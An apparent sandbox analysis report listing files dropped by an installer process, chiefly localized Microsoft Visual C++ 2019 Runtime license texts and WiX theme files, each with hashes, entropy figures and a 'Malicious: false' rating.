Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installation de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Voulez-vous vraiment annuler.?</String>.. <String Id="HelpHeader">Aide du programme d'installation</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - installe, r.pare, d.sinstalle ou.. cr.e une copie locale compl.te du groupe dans le r.pertoire. Install est l'option par d.faut...../passive \| /quiet - affiche une interface minimale, sans invite, ou n'affiche ni interface.. ni invite. Par d.faut, l'interface et toutes les invites sont affich.es...../norestart - supprime toutes les tentatives de red.

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1040\license.rtf

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	11281
Entropy (8bit):	5.046489958240229
Encrypted:	false
SSDEEP:	192:WBGNX6UXR2+5SmgS/ChMErYkQvowHVw6zdgkycEGCDLQ+n3YJ2d8XSiej+T4Ma8f:gAzSVARBR5jEPLQY3YJpSjTP2
MD5:	9D98044BAC59684489C4CF66C3B34C85
SHA1:	36AAE7F10A19D336C725CAFC8583B26D1F5E2325
SHA-256:	A3F745C01DEA84CE746BA630814E68C7C592B965B048DDC4B1BBE1D6E533BE22
SHA-512:	D849BBB6C87C182CC98C4E2314C0829BB48BAD483D0CD97BF409E75457C3695049C3A8ADFE865E1ECBC989A910096D2C1CDF333705AAC4D22025DF91B355278E
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 CONTRATTO DI LICENZA PER IL SOFTWARE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Le presenti condizioni di licenza costituiscono il contratto tra Microsoft Corporation (o, in base al luogo di residenza del licenziatario, una delle sue consociate) e il licenziatario, Tali condizioni si applicano al software Microsoft di cui sopra. Le condizioni si applicano inoltre a qualsiasi servizio o aggiornamento di Microsoft relativo al software, a meno che questo non sia accompagnato da condizioni differenti.\par..\b QUALORA IL LICENZIATARIO SI ATTENGA ALLE PRESENTI CONDIZIONI DI LICENZA, DISPORR\'c0 DEI DIRITTI INDICATI DI SEGUITO.\par....\pard{\pntext\f2\'B7\tab}{\\pn\pnlvlblt\p

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1040\thm.wxl

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3319
Entropy (8bit):	5.019774955491369
Encrypted:	false
SSDEEP:	48:c5DiTlO1eesy+hD9BOtBFv5Vo8BbQhMNDJN3msNlNohNNz+wcPclM+PAoYKp+K/u:uDiTlfQvo8WutJ/s9FHNOJp
MD5:	D90BC60FA15299925986A52861B8E5D5
SHA1:	FADFCA9AB91B1AB4BD7F76132F712357BD6DB760
SHA-256:	0C57F40CC2091554307AA8A7C35DD38E4596E9513E9EFAE00AC30498EF4E9BC2
SHA-512:	11764D0E9F286B5AA7B1A9601170833E462A93A1E569A032FCBA9879174305582BD42794D4131B83FBCFBF1CF868A8D5382B11A4BD21F0F7D9B2E87E3C708C3F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installazione di [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Annullare?</String>.. <String Id="HelpHeader">Guida alla configurazione</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - installa, ripara, disinstalla o.. crea una copia locale completa del bundle nella directory. L'opzione predefinita . Install...../passive \| /quiet - visualizza un'interfaccia utente minima senza prompt oppure non visualizza alcuna interfaccia utente.. n. prompt. Per impostazione predefinita viene visualizzata l'intera interfaccia utente e tutti i prompt...../norestart - annulla quals

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1041\license.rtf

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	28232
Entropy (8bit):	3.7669201853275722
Encrypted:	false
SSDEEP:	192:Qkb65jNkzrUJVbpEiTskXHH1AZWoJxfnVnkDYUqfQFXBue6hX2JSfR7q05kWZxhY:epCD3y/ybox2yrk2
MD5:	8C49936EC4CF0F64CA2398191C462698
SHA1:	CC069FE8F8BC3B6EE2085A4EACF40DB26C842BAC
SHA-256:	7355367B7C48F1BBACC66DFFE1D4BF016C16156D020D4156F288C2B2207ED1C2
SHA-512:	4381147FF6707C3D31C5AE591F68BC61897811112CB507831EFF5E71DD281009400EDA3300E7D3EFDE3545B89BCB71F2036F776C6FDFC73B6B2B2B8FBC084499
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset128 MS Gothic;}{\f1\fnil\fcharset0 MS Gothic;}{\f2\fnil\fcharset134 SimSun;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9\'83\'7d\'83\'43\'83\'4e\'83\'8d\'83\'5c\'83\'74\'83\'67 \'83\'5c\'83\'74\'83\'67\'83\'45\'83\'46\'83\'41 \'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\par..\f1 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f0\'96\'7b\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\'82\'cd\f2\'a1\'a2\f1 Microsoft Corporation (\f0\'82\'dc\'82\'bd\'82\'cd\'82\'a8\'8b\'71\'97\'6c\'82\'cc\'8f\'8a\'8d\'dd\'92\'6e\'82\'c9\'89\'9e\'82\'b6\'82\'c4\'82\'cd\'82\'bb\'82\'cc\'8a\'d6\'98\'41\'89\'ef\'8e\'d0) \'82\'c6\'82\'a8\'8b\'71\'97\'6c\'82\'c6\'82\'cc\'8c\'5f\'96\'f1\'82\'f0\'8d\'5c\'90\'ac\'82\'b5\'82\'dc\'82\'b7\'81\'42\'96\'7b\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1041\thm.wxl

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3959
Entropy (8bit):	5.955167044943003
Encrypted:	false
SSDEEP:	96:uDiTlDuB1n+RNmvFo6bnpojeTPk0R/vueX5OA17IHdGWz:5uB1+gD1DU4EdGE
MD5:	DC81ED54FD28FC6DB6F139C8DA1BDED6
SHA1:	9C719C32844F78AAE523ADB8EE42A54D019C2B05
SHA-256:	6B9BBF90D75CFA7D943F036C01602945FE2FA786C6173E22ACB7AFE18375C7EA
SHA-512:	FD759C42C7740EE9B42EA910D66B0FA3F813600FD29D074BB592E5E12F5EC09DB6B529680E54F7943821CEFE84CE155A151B89A355D99C25A920BF8F254AA008
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.. <Control Control="UninstallButton" X="270" Y="237" Width="120" Height="23"/>.. <Control Control="RepairButton" X="187" Y="237" Width="80" Height="23"/>.. .. <String Id="Caption">[WixBundleName] .......</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">..........</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - ............ ......... .........................

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1042\license.rtf

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	27936
Entropy (8bit):	3.871317037004171
Encrypted:	false
SSDEEP:	384:kKIgbA2uBsarNG/HxPvCL1ewjxsXmEw4C7C7R4jAeqCBO968y7yNRylBSFfQv9yH:d3ar8Xa/XAeqoc0wfBB4qN
MD5:	184D94082717E684EAF081CEC3CBA4B1
SHA1:	960B9DA48F4CDDF29E78BBAE995B52204B26D51B
SHA-256:	A4C25DA9E3FBCED47464152C10538F16EE06D8E06BC62E1CF4808D293AA1AFA2
SHA-512:	E4016C0CA348299B5EF761F456E3B5AD9B99E5E100C07ACAB1369DFEC214E75AA88E9AD2A0952C0CC1B707E2732779E6E3810B3DA6C839F0181DC81E3560CBDA
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset129 Malgun Gothic;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 Microsoft \f1\'bc\'d2\'c7\'c1\'c6\'ae\'bf\'fe\'be\'ee\f0 \f1\'bb\'e7\'bf\'eb\'b1\'c7\f0 \f1\'b0\'e8\'be\'e0\'bc\'ad\f0\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f1\'ba\'bb\f0 \f1\'bb\'e7\'bf\'eb\'b1\'c7\f0 \f1\'b0\'e8\'be\'e0\'c0\'ba\f0 Microsoft Corporation(\f1\'b6\'c7\'b4\'c2\f0 \f1\'b0\'c5\'c1\'d6\f0 \f1\'c1\'f6\'bf\'aa\'bf\'a1\f0 \f1\'b5\'fb\'b6\'f3\f0 \f1\'b0\'e8\'bf\'ad\'bb\'e7\f0 \f1\'c1\'df\f0 \f1\'c7\'cf\'b3\'aa\f0 )\f1\'b0\'fa\f0 \f1\'b1\'cd\'c7\'cf\f0 \f1\'b0\'a3\'bf\'a1\f0 \f1\'c3\'bc\'b0\'e1\'b5\'c7\'b4\'c2\f0 \f1\'b0\'e8\'be\'e0\'c0\'d4\'b4\'cf\'b4\'d9\f0 . \f1\'ba\'bb\f0 \f1\'c1\'b6\'b0\'c7\'c0\'ba\f0 \f1\'c0\'a7\'bf\'a1\f0 \f1\'b8\'ed\'bd\'c3\'b5\'c8\f0 \f1

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1042\thm.wxl

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3249
Entropy (8bit):	5.985100495461761
Encrypted:	false
SSDEEP:	48:c5DiTlO4TesKOwhDNJCkt1NhEN3m/NFNkbKNdExpVgUnqx6IPaRc0KoUK9TKz0KR:uDiTlUJJCsgqf6YVoz4uU5vI54U5TY
MD5:	B3399648C2F30930487F20B50378CEC1
SHA1:	CA7BDAB3BFEF89F6FA3C4AAF39A165D14069FC3D
SHA-256:	AD7608B87A7135F408ABF54A897A0F0920080F76013314B00D301D6264AE90B2
SHA-512:	C5B0ECF11F6DADF2E68BC3AA29CC8B24C0158DAE61FE488042D1105341773166C9EBABE43B2AF691AD4D4B458BF4A4BF9689C5722C536439CA3CDC84C0825965
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] .. ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">.. ...</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - ..... ... .. .. .... .., .., .. .... ...... ... .........../passive \| /quiet - .... .. .. UI. ..... UI ... ..... .... ..... ..... UI. .. ..... ........../norestart - .. .... .. .... ...

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1045\license.rtf

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	13265
Entropy (8bit):	5.358483628484379
Encrypted:	false
SSDEEP:	192:TKpWRd0NE41Y/od7V/sHFos7YLQY9DbLM5D+Vw1VAOb0P4/sHLS7VHwHMPw95a+Q:uy0CG9KZ7qQCw1VAOZ/sHOJfcY2wf6p2
MD5:	5B9DF97FC98938BF2936437430E31ECA
SHA1:	AB1DA8FECDF85CF487709774033F5B4B79DFF8DE
SHA-256:	8CB5EB330AA07ACCD6D1C8961F715F66A4F3D69FB291765F8D9F1850105AF617
SHA-512:	4EF61A484DF85C487BE326AB4F95870813B9D0644DF788CE22D3BEB6E062CDF80732CB0B77FCDA5D4C951A0D67AECF8F5DCD94EA6FA028CFCA11D85AA97714E3
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 POSTANOWIENIA LICENCYJNE DOTYCZ\f1\'a5CE OPROGRAMOWANIA\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Niniejsze postanowienia licencyjne stanowi\f1\'b9 umow\'ea mi\'eadzy Microsoft Corporation (lub, w\~zale\'bfno\'9cci od miejsca zamieszkania Licencjobiorcy, jednym z\~podmiot\f0\'f3w stowarzyszonych Microsoft Corporation) a\~Licencjobiorc\f1\'b9. Maj\'b9 one zastosowanie do wskazanego powy\'bfej oprogramowania. Niniejsze postanowienia maj\'b9 r\f0\'f3wnie\f1\'bf zastosowanie do wszelkich us\'b3ug i aktualizacji Microsoft dla niniejszego oprogramowania, z wyj\'b9tkiem tych, kt\f0\'f3rym towarzysz\f1\'b9 inne postanowienia.\par..\b\

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1045\thm.wxl

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3212
Entropy (8bit):	5.268378763359481
Encrypted:	false
SSDEEP:	48:c5DiTlOPesar4hDo7zGriQjDCN3mDNN0NrsNGl3vxkIP2hUdKLK0KbK4n6W0sfNM:uDiTlusPGriQw8n2rOij4JsU
MD5:	15172EAF5C2C2E2B008DE04A250A62A1
SHA1:	ED60F870C473EE87DF39D1584880D964796E6888
SHA-256:	440B309FCDF61FFC03B269FE3815C60CB52C6AE3FC6ACAD14EAC04D057B6D6EA
SHA-512:	48AA89CF4A0B64FF4DCB82E372A01DFF423C12111D35A4D27B6D8DD793FFDE130E0037AB5E4477818A0939F61F7DB25295E4271B8B03F209D8F498169B1F9BAE
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalator [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Czy na pewno chcesz anulowa.?</String>.. <String Id="HelpHeader">Instalator . Pomoc</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [katalog] - Instaluje, naprawia, odinstalowuje.. lub tworzy pe.n. lokaln. kopi. pakietu w katalogu. Domy.lnie jest u.ywany prze..cznik install...../passive \| /quiet - Wy.wietla ograniczony interfejs u.ytkownika bez monit.w albo nie wy.wietla ani interfejsu u.ytkownika,.. ani monit.w. Domy.lnie jest wy.wietlany interfejs u.ytkownika oraz wszystkie monity...../norestart - Pom

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1046\license.rtf

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	10656
Entropy (8bit):	5.092962528947159
Encrypted:	false
SSDEEP:	192:WIPAufWXXF0+YkR6E0/CiTS0CsGlHIMqf29H7KxLY/aYzApT3anawLXCBX2:VPAufb+YSSCYrCb5BmW4UDaTqzLwX2
MD5:	360FC4A7FFCDB915A7CF440221AFAD36
SHA1:	009F36BBDAD5B9972E8069E53855FC656EA05800
SHA-256:	9BF79B54F4D62BE501FF53EEDEB18683052A4AE38FF411750A764B3A59077F52
SHA-512:	9550A99641F194BB504A76DE011D07C1183EE1D83371EE49782FC3D05BF779415630450174DD0C03CB182A5575F6515012337B899E2D084203717D9F110A6FFE
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMOS DE LICEN\'c7A PARA SOFTWARE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Estes termos de licen\'e7a formam um contrato firmado entre a Microsoft Corporation (ou com base no seu pa\'eds de resid\'eancia, uma de suas afiliadas) e voc\'ea. Eles se aplicam ao software indicado acima. Os termos tamb\'e9m se aplicam a quaisquer servi\'e7os ou atualiza\'e7\'f5es da Microsoft para o software, exceto at\'e9 a extens\'e3o de que eles tenham termos diferentes.\par..\b SE VOC\'ca CONCORDAR COM ESTES TERMOS DE LICEN\'c7A, TER\'c1 OS DIREITOS INDICADOS ABAIXO.\par....\pard{\pntext\f2\'B7\tab}{\\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\t

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1046\thm.wxl

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3095
Entropy (8bit):	5.150868216959352
Encrypted:	false
SSDEEP:	48:c5DiTlO5es/4ThDzmU6lDj4N3mBl0N+NWNP4hHCc9skPDXeKKeK9KfKt4eJ2RQdg:uDiTlJhJGl2UsZMLe6
MD5:	BE27B98E086D2B8068B16DBF43E18D50
SHA1:	6FAF34A36C8D9DE55650D0466563852552927603
SHA-256:	F52B54A0E0D0E8F12CBA9823D88E9FD6822B669074DD1DC69DAD6553F7CB8913
SHA-512:	3B7C773EF72D40A8B123FDB8FC11C4F354A3B152CF6D247F02E494B0770C28483392C76F3C222E3719CF500FE98F535014192ACDDD2ED9EF971718EA3EC0A73E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Instala..o</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Tem certeza de que deseja cancelar?</String>.. <String Id="HelpHeader">Ajuda da Instala..o</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [diret.rio - instala, repara, desinstala ou.. cria uma c.pia local completa do pacote no diret.rio. Install . o padr.o..../passive \| /quiet - exibe a IU m.nima sem nenhum prompt ou n.o exibe nenhuma IU e.. nenhum prompt. Por padr.o, a IU e todos os prompts s.o exibidos...../norestart - suprime qualquer tentativa de reiniciar. Por padr.o, a IU perguntar. antes de reiniciar

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1049\license.rtf

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	31915
Entropy (8bit):	3.6440775919653996
Encrypted:	false
SSDEEP:	384:ntaMxngQEqQUaAEJxkSjjujcme51oVwuZOFsrnkGxunWxGc9wtvVYgCzkSxN1S2:npgnmWWNEvVYgCzxD
MD5:	A59C893E2C2B4063AE821E42519F9812
SHA1:	C00D0B11F6B25246357053F6620E57D990EFC698
SHA-256:	0EC8368E87B3DFC92141885A2930BDD99371526E09FC52B84B764C91C5FC47B8
SHA-512:	B9AD8223DDA2208EC2068DBB85742A03BE0291942E60D4498E3DAB4DDF559AA6DCF9879952F5819223CFC5F4CB71D4E06E4103E129727AACFB8EFE48403A04FA
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset204 Tahoma;}{\f1\fnil\fcharset0 Tahoma;}{\f2\fnil\fcharset204 Garamond;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang1049\'d3\'d1\'cb\'ce\'c2\'c8\'df \'cb\'c8\'d6\'c5\'cd\'c7\'c8\'c8 \'cd\'c0 \'cf\'d0\'ce\'c3\'d0\'c0\'cc\'cc\'cd\'ce\'c5 \'ce\'c1\'c5\'d1\'cf\'c5\'d7\'c5\'cd\'c8\'c5 MICROSOFT\par..\f1\lang9 MICROSOFT VISUAL C++ 2019 RUNTIME\par..\b0\f0\lang1049\'cd\'e0\'f1\'f2\'ee\'ff\'f9\'e8\'e5 \'f3\'f1\'eb\'ee\'e2\'e8\'ff \'eb\'e8\'f6\'e5\'ed\'e7\'e8\'e8 \'ff\'e2\'eb\'ff\'fe\'f2\'f1\'ff \'f1\'ee\'e3\'eb\'e0\'f8\'e5\'ed\'e8\'e5\'ec \'ec\'e5\'e6\'e4\'f3 \'ea\'ee\'f0\'ef\'ee\'f0\'e0\'f6\'e8\'e5\'e9 Microsoft (\'e8\'eb\'e8, \'e2 \'e7\'e0\'e2\'e8\'f1\'e8\'ec\'ee\'f1\'f2\'e8 \'ee\'f2 \'ec\'e5\'f1\'f2\'e0 \'e2\'e0\'f8\'e5\'e3\'ee \'ef\'f0\'ee\'e6\'e8\'e2\'e0\'ed\'e8\'ff, \'ee\

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1049\thm.wxl

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	4150
Entropy (8bit):	5.444436038992627
Encrypted:	false
SSDEEP:	48:c5DiTlDhQt9esbrohDTWJt49kAr7DHN3m5GNDCNvNLIkflhrWncPingGdZwK1Kqp:uDiTlDYVgmt4xJ88k193ipzjvL
MD5:	17C652452E5EE930A7F1E5E312C17324
SHA1:	59F3308B87143D8EA0EA319A1F1A1F5DA5759DD3
SHA-256:	7333BC8E52548821D82B53DBD7D7C4AA1703C85155480CB83CEFD78380C95661
SHA-512:	53FD207B96D6BCF0A442E2D90B92E26CBB3ECC6ED71B753A416730E8067E831E9EB32981A9E9368C4CCA16AFBCB2051483FDCFC474EA8F0D652FCA934634FBE8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.... <String Id="Caption">......... ......... [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">....... .. .........</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [.......] - ........., .............., ........ ..... ........ ...... ......... ..... ...... . ......... .. ......... - ............../passive \| /quiet - ........... ....

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1055\license.rtf

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	13379
Entropy (8bit):	5.214715951393874
Encrypted:	false
SSDEEP:	192:1fGkc01jIjZTUDUTvXt2QpfC5VAlCPpDwuOfH7df3YwnnbZIWG2XjQeoO9uBO8CA:Iiqx4Uh2QpMVA8haDdv9nbZzG6oQR2
MD5:	BD2DC15DFEE66076BBA6D15A527089E7
SHA1:	8768518F2318F1B8A3F8908A056213042A377CC4
SHA-256:	62A07232017702A32F4B6E43E9C6F063B67098A1483EEDDB31D7C73EAF80A6AF
SHA-512:	9C9467A2F2D0886FF4302A44AEA89734FCEFBD3CBE04D895BCEACBA1586AB746E62391800E07B6228E054014BE51F14FF63BA71237268F94019063C8C8B7EF74
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT YAZILIMI L\f1\u304?SANS KO\'aaULLARI\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Bu lisans ko\f1\'baullar\u305?, Microsoft Corporation (veya ya\'baad\u305?\u287?\u305?n\u305?z yere g\f0\'f6re bir ba\f1\u287?l\u305? \'bairketi) ile sizin aran\u305?zda yap\u305?lan anla\'bamay\u305? olu\'baturur. Bu ko\'baullar, yukar\u305?da ad\u305? ge\f0\'e7en yaz\f1\u305?l\u305?m i\f0\'e7in ge\'e7erlidir. \f1\'aaartlar, yaz\u305?l\u305?m i\f0\'e7in t\'fcm Microsoft hizmetleri veya g\'fcncelle\f1\'batirmeleri i\f0\'e7in, beraberlerinde farkl\f1\u305? \'baartlar bulunmad\u305?\u287?\u305? s\f0\'fcrece ge\'e7erlidir.\par..\b BU L\f1\u304?SANS \'aaARTLARINA UYDU\u286?UNUZ TAKD\u304?RDE A\'aaA\u286?IDAK\u3

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1055\thm.wxl

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3221
Entropy (8bit):	5.280530692056262
Encrypted:	false
SSDEEP:	48:c5DiTlOaesHEqhDTHV4zVy6oBzdp0DYK2GP2ZmN3majyNXNoNKQXVvChcPc+WKb0:uDiTl3PHcIflKNTPgdi12xgg
MD5:	DEFBEA001DC4EB66553630AC7CE47CCA
SHA1:	90CED64EC7C861F03484B5D5616FDBCDA8F64788
